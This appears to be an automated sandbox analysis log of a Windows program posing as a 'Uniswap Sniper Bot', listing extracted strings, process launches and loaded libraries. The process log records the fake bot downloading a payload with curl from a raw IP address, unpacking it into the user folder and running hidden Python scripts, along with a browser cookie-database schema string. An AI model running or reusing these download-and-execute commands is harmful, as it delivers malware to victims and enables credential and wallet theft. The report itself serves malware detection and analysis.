Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7C19000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7C19000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE cookies(creation_utc INTEGER NOT NULL,host_key TEXT NOT NULL,top_frame_site_key TEXT NOT NULL,name TEXT NOT NULL,value TEXT NOT NULL,encrypted_value BLOB NOT NULL,path TEXT NOT NULL,expires_utc INTEGER NOT NULL,is_secure INTEGER NOT NULL,is_httponly INTEGER NOT NULL,last_access_utc INTEGER NOT NULL,has_expires INTEGER NOT NULL,is_persistent INTEGER NOT NULL,priority INTEGER NOT NULL,samesite INTEGER NOT NULL,source_scheme INTEGER NOT NULL,source_port INTEGER NOT NULL,is_same_party INTEGER NOT NULL);
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7C19000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7C19000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7C19000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);

Source: Uniswap Sniper Bot With GUI.exe

ReversingLabs: Detection: 13%

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe

File read: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe "C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe"
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv \| "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe"
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://185.153.182.241:1224/pdown""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://185.153.182.241:1224/pdown"
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --mojo-platform-channel-handle=2056 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --app-path="C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar" --no-sandbox --no-zygote --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=6544672486 --mojo-platform-channel-handle=2288 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tar.exe tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\.pyp\python.exe "C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe C:\Users\user\.n2/pay
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe C:\Users\user\.n2/bow
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpn1hib8nx.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe C:\Users\user\.n2/mlip
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe -m pip install wxPython
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv \| "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://185.153.182.241:1224/pdown""	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --mojo-platform-channel-handle=2056 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --app-path="C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar" --no-sandbox --no-zygote --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=6544672486 --mojo-platform-channel-handle=2288 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://185.153.182.241:1224/pdown"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tar.exe tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\.pyp\python.exe "C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe C:\Users\user\.n2/pay
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe C:\Users\user\.n2/bow
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe C:\Users\user\.n2/mlip
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpn1hib8nx.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe -m pip install wxPython
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ffmpeg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kbdus.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: textinputframework.dll	Jump to behavior
